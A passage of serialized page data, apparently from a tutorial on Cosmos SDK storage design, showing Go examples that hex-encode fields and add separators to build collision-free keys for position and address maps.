children":92945},{"style":1335},[92946],{"type":33,"value":92824},{"type":27,"tag":207,"props":92948,"children":92949},{"style":238},[92950],{"type":33,"value":1343},{"type":27,"tag":207,"props":92952,"children":92953},{"style":1335},[92954],{"type":33,"value":16416},{"type":27,"tag":207,"props":92956,"children":92957},{"style":238},[92958],{"type":33,"value":1343},{"type":27,"tag":207,"props":92960,"children":92961},{"style":220},[92962],{"type":33,"value":92963},"positionName",{"type":27,"tag":207,"props":92965,"children":92966},{"style":238},[92967],{"type":33,"value":92845},{"type":27,"tag":207,"props":92969,"children":92970},{"class":209,"line":4154},[92971],{"type":27,"tag":207,"props":92972,"children":92973},{"style":238},[92974],{"type":33,"value":10449},{"type":27,"tag":207,"props":92976,"children":92977},{"class":209,"line":4203},[92978,92982,92986,92990,92994,92998,93002,93006],{"type":27,"tag":207,"props":92979,"children":92980},{"style":220},[92981],{"type":33,"value":92860},{"type":27,"tag":207,"props":92983,"children":92984},{"style":238},[92985],{"type":33,"value":1041},{"type":27,"tag":207,"props":92987,"children":92988},{"style":1335},[92989],{"type":33,"value":92869},{"type":27,"tag":207,"props":92991,"children":92992},{"style":238},[92993],{"type":33,"value":1343},{"type":27,"tag":207,"props":92995,"children":92996},{"style":220},[92997],{"type":33,"value":92904},{"type":27,"tag":207,"props":92999,"children":93000},{"style":238},[93001],{"type":33,"value":1123},{"type":27,"tag":207,"props":93003,"children":93004},{"style":220},[93005],{"type":33,"value":92963},{"type":27,"tag":207,"props":93007,"children":93008},{"style":238},[93009],{"type":33,"value":10449},{"type":27,"tag":207,"props":93011,"children":93012},{"class":209,"line":4249},[93013],{"type":27,"tag":207,"props":93014,"children":93015},{"emptyLinePlaceholder":19},[93016],{"type":33,"value":2062},{"type":27,"tag":207,"props":93018,"children":93019},{"class":209,"line":4290},[93020,93024,93028,93032,93036,93040],{"type":27,"tag":207,"props":93021,"children":93022},{"style":220},[93023],{"type":33,"value":92429},{"type":27,"tag":207,"props":93025,"children":93026},{"style":226},[93027],{"type":33,"value":83648},{"type":27,"tag":207,"props":93029,"children":93030},{"style":220},[93031],{"type":33,"value":89457},{"type":27,"tag":207,"props":93033,"children":93034},{"style":238},[93035],{"type":33,"value":1041},{"type":27,"tag":207,"props":93037,"children":93038},{"style":1335},[93039],{"type":33,"value":92446},{"type":27,"tag":207,"props":93041,"children":93042},{"style":238},[93043],{"type":33,"value":9090},{"type":27,"tag":207,"props":93045,"children":93046},{"class":209,"line":4304},[93047,93051],{"type":27,"tag":207,"props":93048,"children":93049},{"style":1325},[93050],{"type":33,"value":92612},{"type":27,"tag":207,"props":93052,"children":93053},{"style":238},[93054],{"type":33,"value":1842},{"type":27,"tag":207,"props":93056,"children":93057},{"class":209,"line":5466},[93058,93062],{"type":27,"tag":207,"props":93059,"children":93060},{"style":220},[93061],{"type":33,"value":92470},{"type":27,"tag":207,"props":93063,"children":93064},{"style":238},[93065],{"type":33,"value":1842},{"type":27,"tag":207,"props":93067,"children":93068},{"class":209,"line":5530},[93069,93073],{"type":27,"tag":207,"props":93070,"children":93071},{"style":220},[93072],{"type":33,"value":92554},{"type":27,"tag":207,"props":93074,"children":93075},{"style":238},[93076],{"type":33,"value":1842},{"type":27,"tag":207,"props":93078,"children":93079},{"class":209,"line":7900},[93080,93085],{"type":27,"tag":207,"props":93081,"children":93082},{"style":220},[93083],{"type":33,"value":93084}," usernameEncoded",{"type":27,"tag":207,"props":93086,"children":93087},{"style":238},[93088],{"type":33,"value":1842},{"type":27,"tag":207,"props":93090,"children":93091},{"class":209,"line":7909},[93092,93096],{"type":27,"tag":207,"props":93093,"children":93094},{"style":220},[93095],{"type":33,"value":92554},{"type":27,"tag":207,"props":93097,"children":93098},{"style":238},[93099],{"type":33,"value":1842},{"type":27,"tag":207,"props":93101,"children":93102},{"class":209,"line":7917},[93103],{"type":27,"tag":207,"props":93104,"children":93105},{"style":220},[93106],{"type":33,"value":93107}," positionNameEncoded\n",{"type":27,"tag":207,"props":93109,"children":93110},{"class":209,"line":7926},[93111],{"type":27,"tag":207,"props":93112,"children":93113},{"style":238},[93114],{"type":33,"value":10449},{"type":27,"tag":36,"props":93116,"children":93117},{},[93118,93120,93125],{"type":33,"value":93119},"We did it. We finally eliminated all potential ",{"type":27,"tag":84,"props":93121,"children":93123},{"className":93122},[],[93124],{"type":33,"value":92429},{"type":33,"value":93126}," collisions.",{"type":27,"tag":36,"props":93128,"children":93129},{},[93130],{"type":33,"value":93131},"Until now, our focus has primarily been on storing a single structure. We recognize that in real-world applications, we frequently encounter scenarios where multiple structures must be stored as persistent states.",{"type":27,"tag":36,"props":93133,"children":93134},{},[93135,93137,93142,93144,93149,93151,93156,93158,93163,93165,93171],{"type":33,"value":93136},"In the Cosmos framework, it is common for each ",{"type":27,"tag":84,"props":93138,"children":93140},{"className":93139},[],[93141],{"type":33,"value":1953},{"type":33,"value":93143}," to own a few ",{"type":27,"tag":84,"props":93145,"children":93147},{"className":93146},[],[93148],{"type":33,"value":92200},{"type":33,"value":93150}," and have individual ",{"type":27,"tag":84,"props":93152,"children":93154},{"className":93153},[],[93155],{"type":33,"value":87176},{"type":33,"value":93157},"s managing access to storages. It's also important to note that each ",{"type":27,"tag":84,"props":93159,"children":93161},{"className":93160},[],[93162],{"type":33,"value":92200},{"type":33,"value":93164}," should be independent from one another, alleviating developers from having to worry about key collisions between different ",{"type":27,"tag":84,"props":93166,"children":93168},{"className":93167},[],[93169],{"type":33,"value":93170},"Modules",{"type":33,"value":1041},{"type":27,"tag":36,"props":93173,"children":93174},{},[93175,93177,93182],{"type":33,"value":93176},"With that being said, what if we have to maintain more than one structure within the same ",{"type":27,"tag":84,"props":93178,"children":93180},{"className":93179},[],[93181],{"type":33,"value":92200},{"type":33,"value":10444},{"type":27,"tag":36,"props":93184,"children":93185},{},[93186,93188,93194,93196,93201],{"type":33,"value":93187},"To demonstrate this scenario, we introduce the ",{"type":27,"tag":84,"props":93189,"children":93191},{"className":93190},[],[93192],{"type":33,"value":93193},"NameToAddressMap",{"type":33,"value":93195}," structure, which will be stored in the same ",{"type":27,"tag":84,"props":93197,"children":93199},{"className":93198},[],[93200],{"type":33,"value":92200},{"type":33,"value":93202}," we previously used.",{"type":27,"tag":101,"props":93204,"children":93206},{"code":93205,"language":83397,"meta":7,"className":83398,"style":7},"type VaultId uint64\ntype Username string\n\ntype PositionName string\ntype Position struct {\n data []byte\n}\ntype PositionMap :=\n map[VaultId]map[Username]map[PositionName]Position\n\ntype AddressName string\ntype Address struct {\n data []byte\n}\ntype AddressMap :=\n map[VaultId]map[Username]map[AddressName]Address\n",[93207],{"type":27,"tag":84,"props":93208,"children":93209},{"__ignoreMap":7},[93210,93225,93240,93247,93262,93281,93296,93303,93318,93373,93380,93396,93416,93431,93438,93454],{"type":27,"tag":207,"props":93211,"children":93212},{"class":209,"line":210},[93213,93217,93221],{"type":27,"tag":207,"props":93214,"children":93215},{"style":214},[93216],{"type":33,"value":40014},{"type":27,"tag":207,"props":93218,"children":93219},{"style":8920},[93220],{"type":33,"value":92246},{"type":27,"tag":207,"props":93222,"children":93223},{"style":8920},[93224],{"type":33,"value":83435},{"type":27,"tag":207,"props":93226,"children":93227},{"class":209,"line":244},[93228,93232,93236],{"type":27,"tag":207,"props":93229,"children":93230},{"style":214},[93231],{"type":33,"value":40014},{"type":27,"tag":207,"props":93233,"children":93234},{"style":8920},[93235],{"type":33,"value":92262},{"type":27,"tag":207,"props":93237,"children":93238},{"style":8920},[93239],{"type":33,"value":92267},{"type":27,"tag":207,"props":93241,"children":93242},{"class":209,"line":270},[93243],{"type":27,"tag":207,"props":93244,"children":93245},{"emptyLinePlaceholder":19},[93246],{"type":33,"value":2062},{"type":27,"tag":207,"props":93248,"children":93249},{"class":209,"line":296},[93250,93254,93258],{"type":27,"tag":207,"props":93251,"children":93252},{"style":214},[93253],{"type":33,"value":40014},{"type":27,"tag":207,"props":93255,"children":93256},{"style":8920},[93257],{"type":33,"value":92279},{"type":27,"tag":207,"props":93259,"children":93260},{"style":8920},[93261],{"type":33,"value":92267},{"type":27,"tag":207,"props":93263,"children":93264},{"class":209,"line":445},[93265,93269,93273,93277],{"type":27,"tag":207,"props":93266,"children":93267},{"style":214},[93268],{"type":33,"value":40014},{"type":27,"tag":207,"props":93270,"children":93271},{"style":8920},[93272],{"type":33,"value":14707},{"type":27,"tag":207,"props":93274,"children":93275},{"style":214},[93276],{"type":33,"value":28423},{"type":27,"tag":207,"props":93278,"children":93279},{"style":238},[93280],{"type":33,"value":384},{"type":27,"tag":207,"props":93282,"children":93283},{"class":209,"line":867},[93284,93288,93292],{"type":27,"tag":207,"props":93285,"children":93286},{"style":220},[93287],{"type":33,"value":50477},{"type":27,"tag":207,"props":93289,"children":93290},{"style":238},[93291],{"type":33,"value":83460},{"type":27,"tag":207,"props":93293,"children":93294},{"style":8920},[93295],{"type":33,"value":91451},{"type":27,"tag":207,"props":93297,"children":93298},{"class":209,"line":892},[93299],{"type":27,"tag":207,"props":93300,"children":93301},{"style":238},[93302],{"type":33,"value":451},{"type":27,"tag":207,"props":93304,"children":93305},{"class":209,"line":1475},[93306,93310,93314],{"type":27,"tag":207,"props":93307,"children":93308},{"style":214},[93309],{"type":33,"value":40014},{"type":27,"tag":207,"props":93311,"children":93312},{"style":8920},[93313],{"type":33,"value":92336},{"type":27,"tag":207,"props":93315,"children":93316},{"style":226},[93317],{"type":33,"value":92341},{"type":27,"tag":207,"props":93319,"children":93320},{"class":209,"line":2065},[93321,93325,93329,93333,93337,93341,93345,93349,93353,93357,93361,93365,93369],{"type":27,"tag":207,"props":93322,"children":93323},{"style":214},[93324],{"type":33,"value":92349},{"type":27,"tag":207,"props":93326,"children":93327},{"style":238},[93328],{"type":33,"value":11019},{"type":27,"tag":207,"props":93330,"children":93331},{"style":8920},[93332],{"type":33,"value":92358},{"type":27,"tag":207,"props":93334,"children":93335},{"style":238},[93336],{"type":33,"value":22686},{"type":27,"tag":207,"props":93338,"children":93339},{"style":214},[93340],{"type":33,"value":74335},{"type":27,"tag":207,"props":93342,"children":93343},{"style":238},[93344],{"type":33,"value":11019},{"type":27,"tag":207,"props":93346,"children":93347},{"style":8920},[93348],{"type":33,"value":92375},{"type":27,"tag":207,"props":93350,"children":93351},{"style":238},[93352],{"type":33,"value":22686},{"type":27,"tag":207,"props":93354,"children":93355},{"style":214},[93356],{"type":33,"value":74335},{"type":27,"tag":207,"props":93358,"children":93359},{"style":238},[93360],{"type":33,"value":11019},{"type":27,"tag":207,"props":93362,"children":93363},{"style":8920},[93364],{"type":33,"value":92392},{"type":27,"tag":207,"props":93366,"children":93367},{"style":238},[93368],{"type":33,"value":22686},{"type":27,"tag":207,"props":93370,"children":93371},{"style":8920},[93372],{"type":33,"value":92401},{"type":27,"tag":207,"props":93374,"children":93375},{"class":209,"line":2092},[93376],{"type":27,"tag":207,"props":93377,"children":93378},{"emptyLinePlaceholder":19},[93379],{"type":33,"value":2062},{"type":27,"tag":207,"props":93381,"children":93382},{"class":209,"line":2130},[93383,93387,93392],{"type":27,"tag":207,"props":93384,"children":93385},{"style":214},[93386],{"type":33,"value":40014},{"type":27,"tag":207,"props":93388,"children":93389},{"style":8920},[93390],{"type":33,"value":93391}," AddressName",{"type":27,"tag":207,"props":93393,"children":93394},{"style":8920},[93395],{"type":33,"value":92267},{"type":27,"tag":207,"props":93397,"children":93398},{"class":209,"line":2168},[93399,93403,93408,93412],{"type":27,"tag":207,"props":93400,"children":93401},{"style":214},[93402],{"type":33,"value":40014},{"type":27,"tag":207,"props":93404,"children":93405},{"style":8920},[93406],{"type":33,"value":93407}," Address",{"type":27,"tag":207,"props":93409,"children":93410},{"style":214},[93411],{"type":33,"value":28423},{"type":27,"tag":207,"props":93413,"children":93414},{"style":238},[93415],{"type":33,"value":384},{"type":27,"tag":207,"props":93417,"children":93418},{"class":209,"line":4095},[93419,93423,93427],{"type":27,"tag":207,"props":93420,"children":93421},{"style":220},[93422],{"type":33,"value":22379},{"type":27,"tag":207,"props":93424,"children":93425},{"style":238},[93426],{"type":33,"value":83460},{"type":27,"tag":207,"props":93428,"children":93429},{"style":8920},[93430],{"type":33,"value":91451},{"type":27,"tag":207,"props":93432,"children":93433},{"class":209,"line":4103},[93434],{"type":27,"tag":207,"props":93435,"children":93436},{"style":238},[93437],{"type":33,"value":451},{"type":27,"tag":207,"props":93439,"children":93440},{"class":209,"line":4154},[93441,93445,93450],{"type":27,"tag":207,"props":93442,"children":93443},{"style":214},[93444],{"type":33,"value":40014},{"type":27,"tag":207,"props":93446,"children":93447},{"style":8920},[93448],{"type":33,"value":93449}," AddressMap",{"type":27,"tag":207,"props":93451,"children":93452},{"style":226},[93453],{"type":33,"value":92341},{"type":27,"tag":207,"props":93455,"children":93456},{"class":209,"line":4203},[93457,93461,93465,93469,93473,93477,93481,93485,93489,93493,93497,93502,93506],{"type":27,"tag":207,"props":93458,"children":93459},{"style":214},[93460],{"type":33,"value":92349},{"type":27,"tag":207,"props":93462,"children":93463},{"style":238},[93464],{"type":33,"value":11019},{"type":27,"tag":207,"props":93466,"children":93467},{"style":8920},[93468],{"type":33,"value":92358},{"type":27,"tag":207,"props":93470,"children":93471},{"style":238},[93472],{"type":33,"value":22686},{"type":27,"tag":207,"props":93474,"children":93475},{"style":214},[93476],{"type":33,"value":74335},{"type":27,"tag":207,"props":93478,"children":93479},{"style":238},[93480],{"type":33,"value":11019},{"type":27,"tag":207,"props":93482,"children":93483},{"style":8920},[93484],{"type":33,"value":92375},{"type":27,"tag":207,"props":93486,"children":93487},{"style":238},[93488],{"type":33,"value":22686},{"type":27,"tag":207,"props":93490,"children":93491},{"style":214},[93492],{"type":33,"value":74335},{"type":27,"tag":207,"props":93494,"children":93495},{"style":238},[93496],{"type":33,"value":11019},{"type":27,"tag":207,"props":93498,"children":93499},{"style":8920},[93500],{"type":33,"value":93501},"AddressName",{"type":27,"tag":207,"props":93503,"children":93504},{"style":238},[93505],{"type":33,"value":22686},{"type":27,"tag":207,"props":93507,"children":93508},{"style":8920},[93509],{"type":33,"value":93510},"Address\n",{"type":27,"tag":36,"props":93512,"children":93513},{},[93514],{"type":33,"value":93515},"Referencing previous examples, it is necessary to sanitize/encode each key field and add seperators between fields to prevent key collisions. By putting these measures into practice, we present the following implementation below:",{"type":27,"tag":101,"props":93517,"children":93519},{"code":93518,"language":83397,"meta":7,"className":83398,"style":7},"const (\n Seperator = \"|\"\n)\n\n\nfunc PositionMapKey(\n vaultId uint64,\n username, positionName []byte,\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n positionNameEncoded := make(\n []byte,\n hex.EncodedLen(len(positionName)),\n )\n hex.Encode(positionNameEncoded, positionName)\n\n key := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n positionNameEncoded,\n )\n}\n\n\nfunc AddressMapKey(\n vaultId uint64,\n username, addressName []byte\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n addressNameEncoded := make(\n []byte,\n hex.EncodedLen(len(addressName)),\n )\n hex.Encode(addressNameEncoded, addressName)\n\n key := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n addressNameEncoded,\n )\n}\n",[93520],{"type":27,"tag":84,"props":93521,"children":93522},{"__ignoreMap":7},[93523,93534,93549,93556,93563,93570,93586,93601,93628,93651,93670,93686,93722,93729,93764,93771,93791,93806,93841,93848,93883,93890,93918,93930,93942,93954,93966,93977,93989,93996,94003,94010,94017,94033,94048,94072,94095,94114,94129,94164,94171,94206,94213,94233,94248,94283,94290,94326,94333,94360,94371,94382,94393,94404,94415,94427,94434],{"type":27,"tag":207,"props":93524,"children":93525},{"class":209,"line":210},[93526,93530],{"type":27,"tag":207,"props":93527,"children":93528},{"style":214},[93529],{"type":33,"value":16931},{"type":27,"tag":207,"props":93531,"children":93532},{"style":238},[93533],{"type":33,"value":85797},{"type":27,"tag":207,"props":93535,"children":93536},{"class":209,"line":244},[93537,93541,93545],{"type":27,"tag":207,"props":93538,"children":93539},{"style":220},[93540],{"type":33,"value":92554},{"type":27,"tag":207,"props":93542,"children":93543},{"style":226},[93544],{"type":33,"value":229},{"type":27,"tag":207,"props":93546,"children":93547},{"style":1325},[93548],{"type":33,"value":92563},{"type":27,"tag":207,"props":93550,"children":93551},{"class":209,"line":270},[93552],{"type":27,"tag":207,"props":93553,"children":93554},{"style":238},[93555],{"type":33,"value":10449},{"type":27,"tag":207,"props":93557,"children":93558},{"class":209,"line":296},[93559],{"type":27,"tag":207,"props":93560,"children":93561},{"emptyLinePlaceholder":19},[93562],{"type":33,"value":2062},{"type":27,"tag":207,"props":93564,"children":93565},{"class":209,"line":445},[93566],{"type":27,"tag":207,"props":93567,"children":93568},{"emptyLinePlaceholder":19},[93569],{"type":33,"value":2062},{"type":27,"tag":207,"props":93571,"children":93572},{"class":209,"line":867},[93573,93577,93582],{"type":27,"tag":207,"props":93574,"children":93575},{"style":214},[93576],{"type":33,"value":2085},{"type":27,"tag":207,"props":93578,"children":93579},{"style":1335},[93580],{"type":33,"value":93581}," PositionMapKey",{"type":27,"tag":207,"props":93583,"children":93584},{"style":238},[93585],{"type":33,"value":9090},{"type":27,"tag":207,"props":93587,"children":93588},{"class":209,"line":892},[93589,93593,93597],{"type":27,"tag":207,"props":93590,"children":93591},{"style":220},[93592],{"type":33,"value":92470},{"type":27,"tag":207,"props":93594,"children":93595},{"style":8920},[93596],{"type":33,"value":83653},{"type":27,"tag":207,"props":93598,"children":93599},{"style":238},[93600],{"type":33,"value":1842},{"type":27,"tag":207,"props":93602,"children":93603},{"class":209,"line":1475},[93604,93608,93612,93616,93620,93624],{"type":27,"tag":207,"props":93605,"children":93606},{"style":220},[93607],{"type":33,"value":92482},{"type":27,"tag":207,"props":93609,"children":93610},{"style":238},[93611],{"type":33,"value":1123},{"type":27,"tag":207,"props":93613,"children":93614},{"style":220},[93615],{"type":33,"value":92963},{"type":27,"tag":207,"props":93617,"children":93618},{"style":238},[93619],{"type":33,"value":83460},{"type":27,"tag":207,"props":93621,"children":93622},{"style":8920},[93623],{"type":33,"value":91988},{"type":27,"tag":207,"props":93625,"children":93626},{"style":238},[93627],{"type":33,"value":1842},{"type":27,"tag":207,"props":93629,"children":93630},{"class":209,"line":2065},[93631,93635,93639,93643,93647],{"type":27,"tag":207,"props":93632,"children":93633},{"style":238},[93634],{"type":33,"value":83614},{"type":27,"tag":207,"props":93636,"children":93637},{"style":220},[93638],{"type":33,"value":79387},{"type":27,"tag":207,"props":93640,"children":93641},{"style":238},[93642],{"type":33,"value":83460},{"type":27,"tag":207,"props":93644,"children":93645},{"style":8920},[93646],{"type":33,"value":91988},{"type":27,"tag":207,"props":93648,"children":93649},{"style":238},[93650],{"type":33,"value":1424},{"type":27,"tag":207,"props":93652,"children":93653},{"class":209,"line":2092},[93654,93658,93662,93666],{"type":27,"tag":207,"props":93655,"children":93656},{"style":220},[93657],{"type":33,"value":93084},{"type":27,"tag":207,"props":93659,"children":93660},{"style":226},[93661],{"type":33,"value":83648},{"type":27,"tag":207,"props":93663,"children":93664},{"style":1335},[93665],{"type":33,"value":92787},{"type":27,"tag":207,"props":93667,"children":93668},{"style":238},[93669],{"type":33,"value":9090},{"type":27,"tag":207,"props":93671,"children":93672},{"class":209,"line":2130},[93673,93678,93682],{"type":27,"tag":207,"props":93674,"children":93675},{"style":238},[93676],{"type":33,"value":93677}," []",{"type":27,"tag":207,"props":93679,"children":93680},{"style":8920},[93681],{"type":33,"value":91988},{"type":27,"tag":207,"props":93683,"children":93684},{"style":238},[93685],{"type":33,"value":1842},{"type":27,"tag":207,"props":93687,"children":93688},{"class":209,"line":2168},[93689,93694,93698,93702,93706,93710,93714,93718],{"type":27,"tag":207,"props":93690,"children":93691},{"style":220},[93692],{"type":33,"value":93693}," hex",{"type":27,"tag":207,"props":93695,"children":93696},{"style":238},[93697],{"type":33,"value":1041},{"type":27,"tag":207,"props":93699,"children":93700},{"style":1335},[93701],{"type":33,"value":92824},{"type":27,"tag":207,"props":93703,"children":93704},{"style":238},[93705],{"type":33,"value":1343},{"type":27,"tag":207,"props":93707,"children":93708},{"style":1335},[93709],{"type":33,"value":16416},{"type":27,"tag":207,"props":93711,"children":93712},{"style":238},[93713],{"type":33,"value":1343},{"type":27,"tag":207,"props":93715,"children":93716},{"style":220},[93717],{"type":33,"value":92694},{"type":27,"tag":207,"props":93719,"children":93720},{"style":238},[93721],{"type":33,"value":92845},{"type":27,"tag":207,"props":93723,"children":93724},{"class":209,"line":4095},[93725],{"type":27,"tag":207,"props":93726,"children":93727},{"style":238},[93728],{"type":33,"value":31184},{"type":27,"tag":207,"props":93730,"children":93731},{"class":209,"line":4103},[93732,93736,93740,93744,93748,93752,93756,93760],{"type":27,"tag":207,"props":93733,"children":93734},{"style":220},[93735],{"type":33,"value":92815},{"type":27,"tag":207,"props":93737,"children":93738},{"style":238},[93739],{"type":33,"value":1041},{"type":27,"tag":207,"props":93741,"children":93742},{"style":1335},[93743],{"type":33,"value":92869},{"type":27,"tag":207,"props":93745,"children":93746},{"style":238},[93747],{"type":33,"value":1343},{"type":27,"tag":207,"props":93749,"children":93750},{"style":220},[93751],{"type":33,"value":92778},{"type":27,"tag":207,"props":93753,"children":93754},{"style":238},[93755],{"type":33,"value":1123},{"type":27,"tag":207,"props":93757,"children":93758},{"style":220},[93759],{"type":33,"value":92694},{"type":27,"tag":207,"props":93761,"children":93762},{"style":238},[93763],{"type":33,"value":10449},{"type":27,"tag":207,"props":93765,"children":93766},{"class":209,"line":4154},[93767],{"type":27,"tag":207,"props":93768,"children":93769},{"emptyLinePlaceholder":19},[93770],{"type":33,"value":2062},{"type":27,"tag":207,"props":93772,"children":93773},{"class":209,"line":4203},[93774,93779,93783,93787],{"type":27,"tag":207,"props":93775,"children":93776},{"style":220},[93777],{"type":33,"value":93778}," positionNameEncoded",{"type":27,"tag":207,"props":93780,"children":93781},{"style":226},[93782],{"type":33,"value":83648},{"type":27,"tag":207,"props":93784,"children":93785},{"style":1335},[93786],{"type":33,"value":92787},{"type":27,"tag":207,"props":93788,"children":93789},{"style":238},[93790],{"type":33,"value":9090},{"type":27,"tag":207,"props":93792,"children":93793},{"class":209,"line":4249},[93794,93798,93802],{"type":27,"tag":207,"props":93795,"children":93796},{"style":238},[93797],{"type":33,"value":93677},{"type":27,"tag":207,"props":93799,"children":93800},{"style":8920},[93801],{"type":33,"value":91988},{"type":27,"tag":207,"props":93803,"children":93804},{"style":238},[93805],{"type":33,"value":1842},{"type":27,"tag":207,"props":93807,"children":93808},{"class":209,"line":4290},[93809,93813,93817,93821,93825,93829,93833,93837],{"type":27,"tag":207,"props":93810,"children":93811},{"style":220},[93812],{"type":33,"value":93693},{"type":27,"tag":207,"props":93814,"children":93815},{"style":238},[93816],{"type":33,"value":1041},{"type":27,"tag":207,"props":93818,"children":93819},{"style":1335},[93820],{"type":33,"value":92824},{"type":27,"tag":207,"props":93822,"children":93823},{"style":238},[93824],{"type":33,"value":1343},{"type":27,"tag":207,"props":93826,"children":93827},{"style":1335},[93828],{"type":33,"value":16416},{"type":27,"tag":207,"props":93830,"children":93831},{"style":238},[93832],{"type":33,"value":1343},{"type":27,"tag":207,"props":93834,"children":93835},{"style":220},[93836],{"type":33,"value":92963},{"type":27,"tag":207,"props":93838,"children":93839},{"style":238},[93840],{"type":33,"value":92845},{"type":27,"tag":207,"props":93842,"children":93843},{"class":209,"line":4304},[93844],{"type":27,"tag":207,"props":93845,"children":93846},{"style":238},[93847],{"type":33,"value":31184},{"type":27,"tag":207,"props":93849,"children":93850},{"class":209,"line":5466},[93851,93855,93859,93863,93867,93871,93875,93879],{"type":27,"tag":207,"props":93852,"children":93853},{"style":220},[93854],{"type":33,"value":92815},{"type":27,"tag":207,"props":93856,"children":93857},{"style":238},[93858],{"type":33,"value":1041},{"type":27,"tag":207,"props":93860,"children":93861},{"style":1335},[93862],{"type":33,"value":92869},{"type":27,"tag":207,"props":93864,"children":93865},{"style":238},[93866],{"type":33,"value":1343},{"type":27,"tag":207,"props":93868,"children":93869},{"style":220},[93870],{"type":33,"value":92904},{"type":27,"tag":207,"props":93872,"children":93873},{"style":238},[93874],{"type":33,"value":1123},{"type":27,"tag":207,"props":93876,"children":93877},{"style":220},[93878],{"type":33,"value":92963},{"type":27,"tag":207,"props":93880,"children":93881},{"style":238},[93882],{"type":33,"value":10449},{"type":27,"tag":207,"props":93884,"children":93885},{"class":209,"line":5530},[93886],{"type":27,"tag":207,"props":93887,"children":93888},{"emptyLinePlaceholder":19},[93889],{"type":33,"value":2062},{"type":27,"tag":207,"props":93891,"children":93892},{"class":209,"line":7900},[93893,93898,93902,93906,93910,93914],{"type":27,"tag":207,"props":93894,"children":93895},{"style":220},[93896],{"type":33,"value":93897}," key",{"type":27,"tag":207,"props":93899,"children":93900},{"style":226},[93901],{"type":33,"value":83648},{"type":27,"tag":207,"props":93903,"children":93904},{"style":220},[93905],{"type":33,"value":89457},{"type":27,"tag":207,"props":93907,"children":93908},{"style":238},[93909],{"type":33,"value":1041},{"type":27,"tag":207,"props":93911,"children":93912},{"style":1335},[93913],{"type":33,"value":92446},{"type":27,"tag":207,"props":93915,"children":93916},{"style":238},[93917],{"type":33,"value":9090},{"type":27,"tag":207,"props":93919,"children":93920},{"class":209,"line":7909},[93921,93926],{"type":27,"tag":207,"props":93922,"children":93923},{"style":1325},[93924],{"type":33,"value":93925}," \"%d%s%s%s%s\"",{"type":27,"tag":207,"props":93927,"children":93928},{"style":238},[93929],{"type":33,"value":1842},{"type":27,"tag":207,"props":93931,"children":93932},{"class":209,"line":7917},[93933,93938],{"type":27,"tag":207,"props":93934,"children":93935},{"style":220},[93936],{"type":33,"value":93937}," vaultId",{"type":27,"tag":207,"props":93939,"children":93940},{"style":238},[93941],{"type":33,"value":1842},{"type":27,"tag":207,"props":93943,"children":93944},{"class":209,"line":7926},[93945,93950],{"type":27,"tag":207,"props":93946,"children":93947},{"style":220},[93948],{"type":33,"value":93949}," Seperator",{"type":27,"tag":207,"props":93951,"children":93952},{"style":238},[93953],{"type":33,"value":1842},{"type":27,"tag":207,"props":93955,"children":93956},{"class":209,"line":7934},[93957,93962],{"type":27,"tag":207,"props":93958,"children":93959},{"style":220},[93960],{"type":33,"value":93961}," usernameEncoded",{"type":27,"tag":207,"props":93963,"children":93964},{"style":238},[93965],{"type":33,"value":1842},{"type":27,"tag":207,"props":93967,"children":93968},{"class":209,"line":7943},[93969,93973],{"type":27,"tag":207,"props":93970,"children":93971},{"style":220},[93972],{"type":33,"value":93949},{"type":27,"tag":207,"props":93974,"children":93975},{"style":238},[93976],{"type":33,"value":1842},{"type":27,"tag":207,"props":93978,"children":93979},{"class":209,"line":7952},[93980,93985],{"type":27,"tag":207,"props":93981,"children":93982},{"style":220},[93983],{"type":33,"value":93984}," positionNameEncoded",{"type":27,"tag":207,"props":93986,"children":93987},{"style":238},[93988],{"type":33,"value":1842},{"type":27,"tag":207,"props":93990,"children":93991},{"class":209,"line":7961},[93992],{"type":27,"tag":207,"props":93993,"children":93994},{"style":238},[93995],{"type":33,"value":31184},{"type":27,"tag":207,"props":93997,"children":93998},{"class":209,"line":7969},[93999],{"type":27,"tag":207,"props":94000,"children":94001},{"style":238},[94002],{"type":33,"value":451},{"type":27,"tag":207,"props":94004,"children":94005},{"class":209,"line":7978},[94006],{"type":27,"tag":207,"props":94007,"children":94008},{"emptyLinePlaceholder":19},[94009],{"type":33,"value":2062},{"type":27,"tag":207,"props":94011,"children":94012},{"class":209,"line":7987},[94013],{"type":27,"tag":207,"props":94014,"children":94015},{"emptyLinePlaceholder":19},[94016],{"type":33,"value":2062},{"type":27,"tag":207,"props":94018,"children":94019},{"class":209,"line":7996},[94020,94024,94029],{"type":27,"tag":207,"props":94021,"children":94022},{"style":214},[94023],{"type":33,"value":2085},{"type":27,"tag":207,"props":94025,"children":94026},{"style":1335},[94027],{"type":33,"value":94028}," AddressMapKey",{"type":27,"tag":207,"props":94030,"children":94031},{"style":238},[94032],{"type":33,"value":9090},{"type":27,"tag":207,"props":94034,"children":94035},{"class":209,"line":8005},[94036,94040,94044],{"type":27,"tag":207,"props":94037,"children":94038},{"style":220},[94039],{"type":33,"value":92470},{"type":27,"tag":207,"props":94041,"children":94042},{"style":8920},[94043],{"type":33,"value":83653},{"type":27,"tag":207,"props":94045,"children":94046},{"style":238},[94047],{"type":33,"value":1842},{"type":27,"tag":207,"props":94049,"children":94050},{"class":209,"line":8013},[94051,94055,94059,94064,94068],{"type":27,"tag":207,"props":94052,"children":94053},{"style":220},[94054],{"type":33,"value":92482},{"type":27,"tag":207,"props":94056,"children":94057},{"style":238},[94058],{"type":33,"value":1123},{"type":27,"tag":207,"props":94060,"children":94061},{"style":220},[94062],{"type":33,"value":94063},"addressName",{"type":27,"tag":207,"props":94065,"children":94066},{"style":238},[94067],{"type":33,"value":83460},{"type":27,"tag":207,"props":94069,"children":94070},{"style":8920},[94071],{"type":33,"value":91451},{"type":27,"tag":207,"props":94073,"children":94074},{"class":209,"line":8021},[94075,94079,94083,94087,94091],{"type":27,"tag":207,"props":94076,"children":94077},{"style":238},[94078],{"type":33,"value":83614},{"type":27,"tag":207,"props":94080,"children":94081},{"style":220},[94082],{"type":33,"value":79387},{"type":27,"tag":207,"props":94084,"children":94085},{"style":238},[94086],{"type":33,"value":83460},{"type":27,"tag":207,"props":94088,"children":94089},{"style":8920},[94090],{"type":33,"value":91988},{"type":27,"tag":207,"